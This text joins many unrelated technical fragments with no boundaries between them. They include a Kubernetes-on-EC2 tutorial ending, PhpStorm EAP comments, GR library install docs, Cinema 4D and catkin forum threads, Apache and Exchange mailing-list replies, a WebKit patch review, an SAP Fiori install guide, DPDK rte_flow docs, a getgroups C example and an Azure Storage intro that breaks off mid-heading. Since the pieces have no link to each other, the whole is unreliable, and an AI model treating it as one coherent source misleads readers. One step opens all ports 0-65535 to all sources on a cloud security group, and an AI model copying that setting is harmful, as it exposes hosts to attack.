NAME STATUS ROLES AGE VERSION ip-172-31-16-16 Ready <none> 8m v1.11.1 ip-172-31-22-14 Ready master 23h v1.11.1 ip-172-31-33-22 Ready <none> 2m v1.11.1 ip-172-31-35-232 Ready <none> 29s v1.11.1 ip-172-31-42-220 Ready <none> 5m v1.11.1
At this point, we have fully configured cluster consisting of one master and 4 worker nodes.
Create Outside Node
In reference to the architecture diagram above, we also need a node outside the cluster to test cluster access from outside. To create that node:
Launch an instance selecting Ubuntu Server 16.04 LTS (HVM) Amazon Machine Image.
Configure the corresponding security group by adding custom TCP and UDP rules to allow inbound traffic in 0-65535 port range for all sources.
No additional steps are necessary.
View Instances in Amazon EC2 Console
In my console, I entered a name for each node under the Name column. The worker nodes were named Web-1, Web-2, Service-1, Service-2, the master node was named Master, and the outside node was named OutsideNode. It looks like below.
Look for part 2 of this tutorial!
This week’s EAP brings you a pack of important bug fixes and improvements in all areas, along with several new features:
- PHPUnit fast switch between test/source is now available, under Navigate|Test. It will prompt for Generate Test if none is found. Test generation is also improved
- Code Folding state is preserved across restarts and through refactoring for all languages. We might still have some glitches, please report them separately
- Scopes are now easily editable through the main Settings
More details are available in the build.
Those who love to use Code Folding can vote for this:
As long as we are pitching folding improvements, I really think the idea of better keyboard control of the folding level, like outliners have, would be very, very useful.
I noticed a serious UTF-8 encoding problem: try writing some specific chars like “ěščřžýáíé” to a UTF-8 encoded file, save it, and open it in the previous EAP (or another UTF-8 compatible editor…)
BUG or problem with my environment?
Works for me. Please elaborate – you mentioned an encoding problem, but didn’t describe it. Thanks!
I tried it again after invalidating caches and it works for now… On the first try, the editor saved non-UTF characters into the file.
Thanks! Please let us know if you meet the issue again.
This build is really messed up, cannot develop at all, random errors thrown right and left, I’d advise skipping this EAP.
Can’t agree. It seems to work faster (if I’m not mistaken) and more stable.
Got to agree with raveren on this one.
Open a project, then open an existing project in ‘New Window’.
This caused craziness for me: no editor, restart didn’t help, errors disappearing while typing text. I’m back on the previous EAP now.
Hmm, it worked OK all day yesterday for me. Win x64. Maybe it is an OS-related issue?
Any word on when round-trip engineering will be available? I see the UML diagrams are here, but adding methods in the diagram is not supported and neither is adding properties, a.k.a. fields. Just curious.
=)
Well the diagram-suitable operations already work – i.e. Rename plus editing of hierarchy arrows is reflected in code (extends/implements clauses).
We plan to add more supported contexts and more suitable refactorings.
Also watch
The “Exclude Folders” feature still doesn’t work properly when loading the current project, so I returned to 110.226 again.
Please describe the bug, or better create an issue here.
Well, the bug is simple but critical (and it appeared in the previous EAP). When I open PhpStorm and it begins scanning my current project (I use a tmpfs partition for such data, so it is scanned very often), I can watch which folders are scanned, and some (not all) folders marked as excluded in settings are among them. I have a heavy Zend Framework project with tricky PHP code in some 3rd-party plugins, so I always exclude them, because PhpStorm just can’t index them – it hangs with 12 GB RAM and a quad-core Athlon.
110.226 is the last EAP without this bug (and I never saw it before).
Please submit an issue and provide all details there. Thanks!
Any information on when Symfony support will be available? In 3.0, 3.x, 4.0, etc.?
Please watch – WI-241
Is it possible to generate a project-wide (or scope) UML diagram of classes?
At the moment the only way to show several classes on the same diagram is to show the diagram for some class and then add other classes manually using the ‘Add Class to Diagram’ action. Please submit an issue. Thanks!
Now you can drag and drop files onto the diagram. We are also about to enable “create diagram” on any folder – including the project root. Later, after adding the namespaces view, on any namespace as well.
Yes! Can’t wait
I have a problem with Mercurial in WebStorm 110.359.
Description:
All my files have UTF-8 encoding.
When I change any file, after committing to the repository all lines with non-ASCII symbols are marked as changed. The IDE offers to roll them back; if I try to do that, the lines appear as “mojibake”.
Screenshot with problem
Is it an IDE problem or a problem with my environment?
Thanks for the issue!
C library GR¶
Installation¶
You can manually install prebuilt binaries for the GR runtime or install a Linux package.
yum install libXt libXrender libXext Mesa-libGL qt-x11
Note: The CentOS 6 build can be used for other Linux distributions and relies on Qt 4 for the gksqt application, so you may need to install X11, OpenGL and Qt 4 packages specific to your system.
For other versions of GR, see the downloads. If X, GLX or OpenGL is not available, GR3 will fall back to a built-in software renderer which implements all GR3 functionality except for volume rendering. If you are using a headless system, e.g. a Docker container, and want to use gr_volume(), you can use Xvfb or similar tools to start an X server that can be used by GR3.
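For example, on a system with the xvfb package installed, the xvfb-run wrapper starts a temporary X server for the duration of the program (my_gr3_program is a placeholder for your own binary):
xvfb-run -a ./my_gr3_program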
Linux packages¶
Since GR v0.17.2 we provide python-gr .rpm and .deb packages for various Linux distributions using the openSUSE Build Service. Your operating system's package manager will take care of package dependencies.
Please follow the installation instructions for your operating system described here.
We also provide Arch packages for C and Python GR on the Arch User Repository:
If you would like to generate video output, make sure the
ffmpeg package is installed before getting any package
from the AUR.
You can either install these AUR packages manually (see the Arch wiki for help) or by using an AUR helper like yay:
yay -S python-gr-framework
In this example,
yay will install C GR (package
gr-framework) as a dependency automatically.
Getting Started¶
After installing GR, you can try it out by creating a simple plot:
#include <stdio.h>
#include <gr.h>

int main(void)
{
    double x[] = {0, 0.2, 0.4, 0.6, 0.8, 1.0};
    double y[] = {0.3, 0.5, 0.4, 0.2, 0.6, 0.7};

    gr_polyline(6, x, y);
    gr_axes(gr_tick(0, 1), gr_tick(0, 1), 0, 0, 1, 1, -0.01);
    // Press any key to exit
    getc(stdin);
    return 0;
}
To compile and link this example on Linux or macOS, you can run:
cc -I<grdir>/include -L<grdir>/lib -Wl,-rpath,<grdir>/lib -lGR example.c -o example
where you replace <grdir> with the path to your installation of GR.
API Reference¶
The C API for GR consists of:
Listen Specific UserData field [SOLVED]
On 19/03/2016 at 23:15, xxxxxxxx wrote:
Hi, I need to execute some functions from my script every time the user changes something in one user data field. I'm just a beginner with the Python SDK and I don't understand very well how it works, but I thought about it a little: for the user data field that I want to listen to, I made a clone and hid it from the script (just to store the old value), and I always compare it with the main field. If something changed, I do something. In my case I just change the value of a checkbox.
here my script:
import c4d
def main() :
obj = op.GetObject() #get an object with python tag
ud = obj.GetUserDataContainer() #get an userdata container
ud[2][1][c4d.DESC_HIDE] = True #hide my field copy
obj.SetUserDataContainer(ud[2][0], ud[2][1])
new = obj[c4d.ID_USERDATA,1] #value of my filed that i want to listen
old = obj[c4d.ID_USERDATA,3] #value of clone
if old != new:
obj[c4d.ID_USERDATA,2] = 1 - obj[c4d.ID_USERDATA,2] #change value of radiobutton to oposite
obj[c4d.ID_USERDATA,3] = new #store value of my field to clone
So it works well, but it feels like a hack. Is there another method to listen for a change in a user data field?
On 21/03/2016 at 03:07, xxxxxxxx wrote:
Hello,
What exactly do you mean by "script"? Do you mean a script that is stored and executed from the Script Manager? A script in the Script Manager can only be executed from that Script Manager; it cannot be triggered by an event.
Or is your script stored in a Python Tag? Then the best way would be indeed to store the old value in another user data field and compare it with the current value.
Best wishes,
Sebastian
On 21/03/2016 at 05:09, xxxxxxxx wrote:
From python tag. Thank you.
On 21/03/2016 at 05:26, xxxxxxxx wrote:
Originally posted by xxxxxxxx
Or is your script stored in a Python Tag? Then the best way would be indeed to store the old value in another user data field and compare it with the current value.
You can store the old value without an additional user data field.
import c4d

G = {}

def main():
    value = op[c4d.ID_USERDATA, 1]
    if value != G.get('old_value'):
        # Value changed or first time the script is run
        # (e.g. if the scene was just opened).
        G['old_value'] = value
Best,
Niklas
On 21/03/2016 at 07:30, xxxxxxxx wrote:
good method NiklasR. Thank you
problems building - executable package and dependent library package in the same catkin workspace [closed]
Hi,
I'm having some problems getting to grips with catkin/cmake.
Essentially I have 2 CPP packages in the same workspace: 'serial_port' - which is a library build, and 'sonar_interface' - which is an executable "driver" (depends on serial_port)
I cannot figure out how to go about setting up the CMake files to compile this workspace. At the moment I just keep getting:
sonar_interface.cpp:7:27: fatal error: serial_port.hpp: No such file or directory... the offending line is just from me including serial_port.hpp:
#include <serial_port.hpp>
I think this is a problem to do with me not linking properly, but I'm very new to all this so not sure where to start
Any help / tutorial links would be much appreciated,
Thanks
This is not a linker problem, but a compiler problem, probably wrong configuration of include directories. The ROS default would place includes in include/pkg, so the include should read
#include "serial_port/serial_port.hpp", but I don't know how your package is layed out.
Please post more information about your packages, e.g. links to the repos. Than we can provide better support.
Torsten Curdt wrote:
> On 08.03.2008, at 15:25, James Carman wrote:
>
>> On 3/8/08, Torsten Curdt <tcurdt@apache.org> wrote:
>>>
>>> On 08.03.2008, at 13:44, James Carman wrote:
>>>
>>>> All,
>>>>
>>>> The wicket folks are investigating using Commons Proxy and they
>>>> don't want to have to decide which implementation (jdk, cglib,
>>>> javassist) to use themselves. They would like us to split up
>>>> Commons Proxy into 3 jars, commons-proxy, commons-proxy-cglib,
>>>> commons-proxy-javassist. Any thoughts?
>>>
>>>
>>> Is the discovery such a big problem with proxy? ...in general I
>>> prefer the static discovery type. But someone has to do it.
>>
>> Well, Johan makes a good case. He's writing some code that he wants
>> to use Proxy, but he doesn't want to have to figure out what
>> implementation to use himself. He'd rather it be done automatically
>> for him, by doing something like ProxyFactory.getInstance(). I
>> thought about this at one time. I guess we could say, instantiate
>> your class that's based on Proxy by passing in whatever
>> implementation the client wants. So, he could have something like:
>>
>> public class MyFrameworkClass
>> {
>> public MyFrameworkClass(ProxyFactory proxyFactory) {
>> this.proxyFactory = proxyFactory;
>> }
>>
>> public Object createSomeKindOfProxy(SomeArgument arg) {
>> return proxyFactory.create...
>> }
>> }
>
> Well, one could just try and see what classes are available in the
> classpath. This could be easily be done in a wrapper class as you
> suggested.
Shrug. And suddenly someone adds a new library that introduces new deps (e.g. Hibernate
bringing in CGLIB). Why not simply use the JDK proxy as the default and use a system property
to override the selection? If a project depends on a more powerful proxy implementation, it
has to select one itself or document this fact for its users (e.g. that they have to use
CGLIB- or Javassist-based proxies).
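A rough sketch of that suggestion (all names here are hypothetical, not existing Commons
Proxy API; it assumes the plain ProxyFactory is the JDK-based implementation):

// JDK proxies by default; a system property can name an alternative
// ProxyFactory subclass (e.g. the CGLIB- or Javassist-based one).
public final class ProxyFactories {
    private static final String PROPERTY = "org.apache.commons.proxy.factory";

    public static ProxyFactory getInstance() {
        String impl = System.getProperty(PROPERTY);
        if (impl == null) {
            return new ProxyFactory(); // no extra dependencies needed
        }
        try {
            return (ProxyFactory) Class.forName(impl).newInstance();
        } catch (Exception e) {
            throw new IllegalStateException("Cannot instantiate " + impl, e);
        }
    }
}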
- Jörg
Re: updating to 2003
- From: "Lanwench [MVP - Exchange]" <lanwench@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
- Date: Mon, 16 Jan 2006 22:45:43 -0500
In news:F_Vyf.317$MJ.123@fed1read07,
anon <not@xxxxxxxxx> typed:
> i'm faced with the task of updating windows 2000 advanced server
> (with 2 active directory/fileservers clustered together in failover
> configuration).
>
> since the domain they have set up is sales.company.com, i'm probably
> just going to start them on a new domain as per todays standard such
> as company.local or company.corp. any recommendations for which
> naming scheme i should use?
Well, if sales.company.com doesn't exist on the Internet for any useful
purpose, no harm in leaving it in place as your AD DNS namespace. It may
actually be preferable over using .local or .kitten or .whatnot. I often
use internal.company.com or local.company.com.
>
> also, i'm pretty sure i should just start a brand new domain
> structure from scratch to ensure that there are no previous "ghosts"
> or some such floating around waiting to deliver the hammer.
Why? Are you worried that the current installation is full of problems?
Don't make more work for yourself... I'm no clustering expert, but I think
you don't want to muck around with something that works.
> does
> anyone have books or other reading related for planning and deploying
> such and move?
>
> -a
Created attachment 43618 [details]
Repro test
Can't type when the content-editable object has focus. This occurs when there is a DIV element with only a non-editable element.
(see attached test case)
Created attachment 43619 [details]
Proposed patch
Working on the test case. No change log yet.
Created attachment 43818 [details]
Patch
Attachment 43818 [details] did not pass style-queue:
Failed to run "WebKitTools/Scripts/check-webkit-style" exit_code: 1
Done processing WebCore/rendering/RenderText.h
Done processing WebCore/editing/htmlediting.cpp
WebCore/dom/Position.cpp:327: Boolean expressions that span multiple lines should have their operators on the left side of the line instead of the right side. [whitespace/operators] [4]
Done processing WebCore/dom/Position.cpp
Done processing WebCore/dom/PositionIterator.cpp
Done processing WebCore/dom/Position.h
Done processing WebCore/dom/PositionIterator.h
Done processing WebCore/rendering/RenderObject.cpp
Done processing WebCore/rendering/RenderText.cpp
Total errors found: 1
Created attachment 44038 [details]
Patch2
Fixed line 327 in Position.cpp to have && at the beginning of the line.
style-queue ran check-webkit-style on attachment 44038 [details] without any errors.
Comment on attachment 44038 [details]
Patch2
It seems unnecessary to make atEditingBoundary be a member function on Position and PositionIterator. Can we instead just make those free functions?
> +// A position is considered at editing boundary if one of the following is true:"
Stray quote mark on the end of the line above.
> +// 1. it is the first position in the node and the next visually equivalent position
> +// is non editable
> +// 2. it is the last position in the node and the previous visually equivalent position
> +// is non editable
> +// 3. is is an editable position and both the next and previous visually equivalent
> +// positions are both non editable
Typo "is is" here. I would put capital letters and periods on these three conditions.
> + return (nextPosition.isNotNull() && !nextPosition.node()->isContentEditable())
> + && (prevPosition.isNotNull() && !prevPosition.node()->isContentEditable());
I think this would read better without the parentheses. Also, the second line should be indented only 4 spaces, not 7 -- we don't try to line things up.
> +Position Position::upstream(EditingBoundaryCrossingRule upRule) const
I'd probably call this boundaryRule or crossingRule or even "rule" rather than upRule.
> return Position();
> -
> +
> // iterate forward from there, looking for a qualified position
The patch has a lot of whitespace changes like the above. It would be better to not have these changes.
> + bool lastPosition = (caretOffset == lastOffsetInNode(node()));
> + Node* startNode = (lastPosition)? node()->childNode(caretOffset - 1): node()->childNode(caretOffset);
It should be formatted as "lastPosition ? a : b" rather than "(lastPosition)? a: b".
> +bool PositionIterator::atEditingBoundary() const
> +{
> + if (!m_anchorNode)
> + return false;
> +
> + return Position(*this).atEditingBoundary();
> +}
I don't think you need a special case for !m_anchorNode here. Do you?
> // If this is a non-anonymous renderer, then it's simple.
This comment seems wrong now. It's not all that simple any more! Maybe we should say something more about it rather than "it's simple".
> - if (Node* node = this->node())
> + if (Node* node = this->node()) {
> + if (!node->isContentEditable()) {
> + // prefer a visually equivalent position that is editable
We use sentence format for this type of comment. Capitals and a period at the end.
> + Position pos(node, offset);
It would be better to name this "position" rather than "pos".
> + int len = textLength();
This should be unsigned rather than int. And should be named a word, like "length" rather than an abbreviation such as "len".
> + const UChar* txt = characters();
Instead of "txt" I suggest either "characters" or "text" as the name for this local variable.
> + for (int i = 0; i < len; i++)
> + if (!style()->isCollapsibleWhiteSpace(txt[i]))
> + return false;
WebKit coding style uses braces around a multi-line for statement like this one.
r=me -- all the comments are optional things
Committed revision 51522.
I've addressed all comments from Darin.
*** Bug 20325 has been marked as a duplicate of this bug. ***
*** Bug 19698 has been marked as a duplicate of this bug. ***
Assign to me Condition - Help (AlmeidaR, Aug 29, 2016 7:35 AM)
Hi All,
I am having an issue with the "assign to me" function that did not occur in the past:
When the assigned user is not the current analyst, the option should appear.
Currently, when an incident is opened, it is shifted to a support group and only later assigned to an analyst, so no analyst will be assigned at this stage (the value will be null).
I compared with an older incident that I had opened previously, and the "Assign to me" option appears if there is a value in the analyst field which is not the current user.
Is it possible to have this option activated also when the analyst field is null?
I am quite sure this was working that way in the past.
Many thanks in advance.
Best Regards,
Ricardo Almeida
1. Re: Assign to me Condition - Help (Markus.Gonser, Aug 29, 2016 7:48 AM, in response to AlmeidaR)
2. Re: Assign to me Condition - Help (csoto, Aug 29, 2016 8:23 AM, in response to Markus.Gonser)
I use a similar Calculation:
import System

static def GetAttributeValue(Request):
    Value = false
    if Request.CurrentAssignment != null:
        if Request.GetCurrentUserName() != Request.CurrentAssignment.User.Name:
            Value = true
    return Value
Note, this is for Request, but I do a similar thing with Incident. Condition = "Equals"; Value Type="Specific value"; Value = "True"
So, why might a standard condition evaluation not work? If there is no current assignment User, the attribute being evaluated is null. Only a calculation can first check for the null condition, then make the evaluation. You *could* theoretically use a standard condition check, but only if your process assures there is always an assignment before this condition. As these calculations will work regardless, it's a better idea just to use the calculation.
Charles
3. Re: Assign to me Condition - Help (AlmeidaR, Aug 29, 2016 8:54 AM, in response to Markus.Gonser)
Hello Markus,
thanks for the feedback.
After a bit more investigation I realized this is not working because the "user assignment" field is not filled while the incident is in progress. As there is no value, the system does not compare. I will also have to add an IF NULL check to the condition.
Many thanks for the feedback
Best Regards,
Ricardo
4. Re: Assign to me Condition - Help (AlmeidaR, Aug 29, 2016 8:55 AM, in response to csoto)
Hello csoto,
thanks for the swift feedback.
I realized this is not working because the "user assignment" field is not filled while the incident is in progress. As there is no value, the system does not compare. I will also have to add an IF NULL check to the condition. If there is an analyst in that field who is not the current user, the assign to me option appears.
Many thanks for the feedback
Best Regards,
Ricardo
Pádraig Brady <address@hidden> writes:

> +#if HAVE_C99_STRTOLD /* provided by c-strtold module. */
> +# define STRTOD strtold
> +#else
> +# define STRTOD strtod
> +#endif
> +
>   char *ea;
>   char *eb;
> -  double a = strtod (sa, &ea);
> -  double b = strtod (sb, &eb);
> +  long double a = STRTOD (sa, &ea);
> +  long double b = STRTOD (sb, &eb);

This could cause performance problems on machines that have slow long-double operations (implemented via traps, say) and that lack strtold. How about doing something like this instead? It tries to move as much of the mess as possible to the #if part.

#if HAVE_C99_STRTOLD
# define long_double long double
#else
# define long_double double
# undef strtold
# define strtold strtod
#endif
...
long_double a = strtold (sa, &ea);
long_double b = strtold (sb, &eb);
Info
This guide focuses on the installation of the ‘Create Sales Orders’ transactional Fiori app in an ABAP environment on ERP 6.0 EHP 7 running an embedded Gateway, using transaction SAINT. There are other ways to install apps, e.g. with SAP Maintenance Planner, that are not described here.
Prerequisites
Make sure you have installed and configured the Gateway and all necessary SAPUI5 components.
Business Scenario
You have been asked to simplify the user experience at your company to save on training for new and existing Field Sales Representatives. You have heard of Fiori but are not sure how to start.
Step 1 – Find a FIORI app to simplify Sales Orders creation
Access the SAP Fiori apps reference library and search for the ‘Create Sales Orders’ app.
This website should be the main starting point when implementing a Fiori app. It describes the app's features, installation information and configuration, as well as extension points, which tell you what features of the standard app can be enhanced. If you can't find a relevant Fiori app, you may consider creating a custom one.
Once you have found the required app, you may want to check the database it runs on as well as the prerequisites for installation:
‘Any DB’ means we don’t need the HANA database. If the above says ‘HANA’, then we need either SAP Business Suite on HANA or S/4HANA in order to install and run the app.
Step 2 – Deploy the Front-End Components
a) Download the Front-End component files
From the FIORI catalogue identify the front ends components to be installed (Implementation Information/Installation/Front-End Components):
Download the above component from the SAP Software Download Center:
Along with all the corresponding support packages 0001-0010
Example:
b) Install the files
Log in to client 000 of your system.
Run transaction SAINT.
Install the downloaded UI components.
c) Activate the SICF for App URL
Identify name of the app from the Fiori apps library (Implementation Information/Configuration/SAPUI5 Application)
Run transaction SICF and use the following path: default_host -> sap -> bc -> UI5_UI5 -> sap -> sd_so_cre
You can see that the service is grey, which means it is inactive. Right-click it and activate it.
Step 3 – Deploy the Back-End Components
a) Download the Back-End components files
From the FIORI apps catalogue identify the front ends components to be installed (Implementation Information/Installation/Back-End Components):
Download the above component from the SAP Software Download Center:
Along with the support packages 0001 – 0008
b) Install the files
Log in to client 000 of your system.
Run transaction SAINT.
Install the downloaded Back-End components.
c) Activate the OData service
Identify the name of the OData Service from the Fiori apps catalogue (Implementation Information/Configuration/OData Services)
Run transaction /IWFND/MAINT_SERVICE and click ‘Add Service’:
Choose the System Alias and Technical Service Name:
Select the displayed Backend Service and click on ‘Add Selected Services’:
You will get an ‘Add Service’ pop-up. Assign a package (I am using a local object for test purposes; in a real scenario, create a package)
And press continue.
The OData service should now be visible in the Service Catalog of transaction /IWFND/MAINT_SERVICE
Step 4 – Authorizations
SAP provides you with role templates once you install the relevant app components. You can either use the existing templates or make a Z copy of them. This is up to your authorization team and should be adapted to your authorization concept.
Since I am using embedded Gateway the following steps may differ if using Gateway Central Hub Deployment where you need to take care of authorizations both on the ECC side and the Gateway side.
a) Create PFCG role with Launchpad Start Authorization
Copy role SAP_UI2_USER_700 under the Z namespace e.g. Z_UI_USER
Click on the ‘Menu’ tab and add ‘Authorization Default’
Add IWSG authorizations for: ZINTEROP_0001 and ZPAGE_BUILDER_PERS_0001
Go to tab ‘Authorizations’ click on ‘Change Authorization Data’
Click:
Add the following authorization objects:
Make sure the traffic lights are green by clicking on them:
Generate the authorization profile and save it.
Assign the authorization role to the user in the ‘User’ tab and click on ‘User Comparison’
b) Create PFCG Role for Launchpad Catalogues and Groups
Find the business role template in the FIORI apps library documentation for our SD app.
Go to transaction PFCG and copy it into the Z namespace e.g. ZSAP_SD_BCR_FIELDSALESREP_X1
In our new role we can see that the following elements have been copied:
Which gives users access to the tile catalogue and tile group in the FIORI Launchpad.
Generate a profile and assign to the user just like in step a)
c) Create PFCG role to access oData services
Copy roles SAP_SD_SO_CRE_APP under Z namespace e.g. ZSAP_SD_SO_CRE_APP
Add IWSG authorizations for: ZSRA017_SALESORDER_CREATE_SRV_0001
Go to the ‘Menu’ tab and click on add ‘Authorization Default’
Enter the following details:
Save the role menu and you should now see the following:
Generate the profile and assign to the user just like in step a)
Note: In the backend, the user must have authorization for the trusted RFC connection if you have a central hub Gateway.
To check for authorization issues towards the backend, use transaction /IWFND/ERROR_LOG.
Step 5 – Test the app
The natural entry point for Fiori apps is the Fiori Launchpad, which is a container for all your Fiori apps and should be used in the production environment. After the installation, however, you may want to test whether the app works correctly by running it in standalone mode.
In order to run the app in a standalone mode you need to use the following link format:
http://<server>:<port>/sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?sap-client=<client>#Shell-runStandaloneApp?sap-ushell-SAPUI5.Component=<ComponentName>&sap-ushell-url=<Encoded-URL>&<AdditionalApplicationParameterKey>=<AdditionalApplicationParameterValue>
Server and port
This is your server name and port your app will be running on
Component Name
To get the component name, open the following URL: http://<server>:<port>/sap/bc/ui5_ui5/sap/sd_so_cre/Component.js
And get the component name:
Shell url
This is the URL pointing to the app resource file location on the server: /sap/bc/ui5_ui5/sap/sd_so_cre
The full link will look as follows:
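For example, with a hypothetical host myserver, port 8000, and client 100 (and using cus.sd.salesorder.create purely as an illustrative component name), the assembled URL would take this shape:

http://myserver:8000/sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?sap-client=100#Shell-runStandaloneApp?sap-ushell-SAPUI5.Component=cus.sd.salesorder.create&sap-ushell-url=%2Fsap%2Fbc%2Fui5_ui5%2Fsap%2Fsd_so_cre

Note that the sap-ushell-url value is the resource path from above in URL-encoded form.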
You should now be able to test your app in standalone mode. The configuration of the Fiori Launchpad will be described in my next blog.
Hmmmm.... rather think you are missing a few steps there... such as:
Also - probably not good to suggest we always use $TMP - that's ok for a Proof of Concept but not for a development project that is planning to go to production.
You might want to also reference the full documentation on how to do this in the UI Technology Guide for the relevant release.
Thank you for your comments. I am aware of the above, but the purpose of this guide is to show the bare minimum needed to install the app, without configuring any authorizations, adding it to the launchpad, etc. Also, I am not suggesting we always use $TMP; I clearly mentioned it was done for test purposes. To avoid misunderstanding, I have also mentioned creating a package in real production scenarios.
The challenge always with bare bones guides is that they still need to work... so you might also want to edit it to mention you are using a user with SAP_ALL in both frontend server and backend server. Otherwise it won't be too long before the dreaded "Could not open app. Try again later" message appears.
I have now added a step about authorizations. I am using an embedded Gateway so no split to backend and frontend servers in my case.
Hi Radek,
Thanks for such a helpful post. I was trying to install the same application, but in the Fiori apps library, under the installation section, I could not find the software component version for the front-end components which you have mentioned above inside the red box.
Same for the back-end components. I am attaching both images. Hence I am not able to see the ICF service (SD_SO_CRE) on my front-end server. Please guide me on how to proceed further.
Thanks in Advance.
Thanks,
Unfortunately all links to pictures are gone?
Is there not a link to Standard SAP documentation?
Bas
#include <rte_flow.h>
Matching pattern item definition.
A pattern is formed by stacking items starting from the lowest protocol layer to match. This stacking restriction does not apply to meta items which can be placed anywhere in the stack without affecting the meaning of the resulting pattern.
Patterns are terminated by END items.
The spec field should be a valid pointer to a structure of the related item type. It may remain unspecified (NULL) in many cases to request broad (nonspecific) matching. In such cases, last and mask must also be set to NULL.
Optionally, last can point to a structure of the same type to define an inclusive range. This is mostly supported by integer and address fields, may cause errors otherwise. Fields that do not support ranges must be set to 0 or to the same value as the corresponding fields in spec.
Only the fields defined to nonzero values in the default masks (see rte_flow_item_{name}_mask constants) are considered relevant by default. This can be overridden by providing a mask structure of the same type with applicable bits set to one. It can also be used to partially filter out specific fields (e.g. as an alternate means to match ranges of IP addresses).
Mask is a simple bit-mask applied before interpreting the contents of spec and last, which may yield unexpected results if not used carefully. For example, if for an IPv4 address field, spec provides 10.1.2.3, last provides 10.3.4.5 and mask provides 255.255.0.0, the effective range becomes 10.1.0.0 to 10.3.255.255.
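As a rough illustration of the example above (a sketch, not taken from the header; it assumes a recent DPDK with the RTE_IPV4 and RTE_BE32 helpers), such a range match could be populated as follows:

#include <rte_byteorder.h>
#include <rte_ip.h>
#include <rte_flow.h>

/* Sketch: match IPv4 source addresses given spec 10.1.2.3, last 10.3.4.5
 * and mask 255.255.0.0, i.e. the effective range 10.1.0.0 - 10.3.255.255. */
static const struct rte_flow_item_ipv4 ipv4_spec = {
	.hdr.src_addr = RTE_BE32(RTE_IPV4(10, 1, 2, 3)),
};
static const struct rte_flow_item_ipv4 ipv4_last = {
	.hdr.src_addr = RTE_BE32(RTE_IPV4(10, 3, 4, 5)),
};
static const struct rte_flow_item_ipv4 ipv4_mask = {
	.hdr.src_addr = RTE_BE32(0xffff0000),
};

static const struct rte_flow_item pattern[] = {
	/* Lower protocol layers (e.g. ETH) would normally come first. */
	{
		.type = RTE_FLOW_ITEM_TYPE_IPV4,
		.spec = &ipv4_spec,
		.last = &ipv4_last,
		.mask = &ipv4_mask,
	},
	{ .type = RTE_FLOW_ITEM_TYPE_END }, /* patterns are terminated by END */
};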
Definition at line 2026 of file rte_flow.h.
Item type.
Definition at line 2027 of file rte_flow.h.
Pointer to item specification structure.
Definition at line 2028 of file rte_flow.h.
Defines an inclusive range (spec to last).
Definition at line 2029 of file rte_flow.h.
Bit-mask applied to spec and last.
Definition at line 2030 of file rte_flow.h.
We are happy to announce that we will be releasing the next CTP/LABS bits on April 5th. We would also like to take this opportunity to give you a heads-up on the impact
due to the release. Because of the nature of the feature enhancements, we will be installing fresh bits in the Azure environment and releasing a new version of the client SDK. Please note that all existing configuration in the Service Bus EAI and EDI LABS environment will be removed, except possibly namespaces.
Users are advised to complete the following activities by
noon April 4th:
Detailed feature announcements will be posted in the forums after the release.
-
Azure Integration Services Team
To solve this problem, the getgroups(int gidsetlen, gid_t *gidset) function is needed. The code below shows how to use it. Currently the example sets access to 1 for anyone in group 0 (wheel) and leaves access as zero for everyone else. It is set to check a maximum of 5 groups.
By changing the #defines you can easily make this code search for any group, and make it check more or less groups that a user is a member of, depending on how your system is setup.
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>

/* Group to search for, and max groups to look at *
 * with the user */
#define GROUP 0
#define MAX_GROUPS 5

int main(void)
{
    gid_t gidset[MAX_GROUPS];
    int groups;
    int i;
    int access = 0;

    /* Get the groups, then loop through to see if *
     * desired group is present */
    groups = getgroups(MAX_GROUPS, gidset);
    for (i = 0; i <= groups - 1; i++)
        if (gidset[i] == GROUP) access = 1;

    /* Also check if desired group is primary group *
     * (then it doesn't show in getgroups) */
    if (getegid() == GROUP) access = 1;

    printf("access = %d\n", access);
    return 0;
}
Microsoft has created a unique benchmark in the world of cloud computing with Microsoft Azure. Many renowned enterprises all over the world use Microsoft Azure for its various IaaS solutions. Azure Storage is one of the proven and highly demanded solutions on Microsoft Azure for enterprises to avail cost-effective, secure, and resilient data storage. Therefore, many aspiring database administrators, engineers, and data specialists look towards an Azure Storage tutorial.
The following discussion would serve as a tutorial on Azure Storage with in-depth insights on its types and architecture. Readers can use the information presented below to anticipate the effectiveness of Azure Storage as a modern cloud-based storage system.
What is Azure Storage?
The first concern in any Azure Storage tutorial directly refers to its definition. Azure Storage is the cloud storage solution of Microsoft for various new data storage scenarios in present times. As the volume of data in various repositories and warehouses increases every day, enterprises need better methods of storage.
Now, it is obvious to wonder about the reasons to opt for storing in the cloud in the first place. First of all, you don’t need any physical space or hardware for storing your massive amount of data, thereby ensuring cost savings. Cloud storage allows users to scale the storage capacity up or down according to their requirements.
Most important of all, cloud storage makes sure that your data is available to you at all times. The core storage services on Azure Storage offer different options such as disk storage for Azure virtual machines (VMs), messaging stores, NoSQL store, file system service, and a massively scalable object-store.
Why is Azure Storage Important?
The types of storage services you can find in an Azure Storage tutorial can offer the following functionalities for users.
- Redundancy in Azure Storage helps in ensuring data safety in the event of unprecedented hardware failures. Users can also choose to replicate data throughout datacenters or geographical regions to ensure additional protection from natural disasters. The replication of data in this manner also provides higher data availability in the event of unexpected downtime.
- The services on Azure Storage offer the highest levels of security through encryption of all data written to Azure Storage accounts. Azure Storage also provides fine-grained control over access privileges to users.
- The design of Azure Storage specifically aims at providing the desired scalability for addressing data storage and performance requirements of modern applications.
- Azure Storage also ensures comprehensive management of hardware maintenance, critical issues, and other associated updates for users.
- The final aspect pertaining to the advantages of Azure Storage in an Azure Storage tutorial refers to accessibility.
Users can access data in Azure Storage from almost anywhere through HTTP or HTTPS. Microsoft also provides client libraries for Azure Storage in different languages such as Python, .NET, Java, Go, PHP, Node.js, Ruby, and others. In addition, you also get a mature REST API with Azure Storage.
Another interesting factor of Azure Storage in terms of accessibility refers to the support for scripting in Azure CLI or Azure PowerShell. Most important of all, Azure Storage Explorer and the Azure portal provide flexible visual solutions for working with data.
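For instance, a few Azure CLI commands give a feel for this scripting support (all account, resource group, and container names below are placeholders):

# Placeholder names throughout; a sketch of the scripting support, not a full setup.
az storage account create --name mystorageacct123 --resource-group my-rg --location eastus --sku Standard_LRS
az storage container create --name mycontainer --account-name mystorageacct123
az storage blob upload --account-name mystorageacct123 --container-name mycontainer --name hello.txt --file ./hello.txt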
Types of Azure Storage Services
